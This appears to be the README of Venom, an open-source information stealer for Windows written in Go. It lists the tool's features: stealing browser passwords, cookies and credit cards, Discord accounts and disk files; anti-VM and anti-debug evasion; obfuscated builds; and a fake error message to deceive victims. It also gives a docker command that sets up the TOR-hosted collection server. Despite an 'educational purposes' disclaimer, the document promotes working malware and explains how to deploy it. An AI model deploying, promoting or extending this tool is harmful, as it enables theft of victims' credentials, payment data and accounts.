Venom is a free (as in freedom) and open source information stealer tool targeting x64 Windows 10/11 systems, written in Go.
Caution
This software is designed and shared only for educational and research purposes. It's is provided without warranty and the distribution platform or the developers of the software are not responsible for any material, moral or legal damage that may occur due to incorrect or unethical use of the software.
Page: home | Page: data | Page: build |
---|---|---|
- Easy setup with Docker
- Web interface over TOR
- Compile time obfuscated builds for unique signatures
- Anti-VM (Anti-Sandbox) and Anti-Debug features for protection
- Steal browser information (cookies, history data, passwords and credit cards) from popular Chromium-based browsers
- Steal discord account information from popular Chromium-based browsers and the Discord app
- Steal files from the disk
- Display fake error message to trick the user
- Fairly small build sizes (~4MB)
- Multi-language support (🇬🇧 English and 🇹🇷 Turkish)
For a minimal setup, the server requirements are:
- Static IP
- At least 512MB memory
- At least a 1 core CPU
- Docker, you can install it with your distro's package manager
The docker image is a quite big one (~1GB) so this command may take a while:
docker run -d -p 80:8082 \
-e VENOM_ALLINT=true \
-e VENOM_URL=http://<ip> \
-v $PWD/db:/venom/server/db \
-v $PWD/tor:/var/lib/tor/venom \
ghcr.io/ngn13/venom:latest
Then checkout the logs for the server (docker logs <id>
) to learn the onion
address, so you can access the interface over TOR. Please check out the docs
for a more advanced setup.
If you are having any problems then create an issue.
If like this project, then please consider contributing! You can do so by adding new features, fixing bugs, adding translations or by just leaving a star!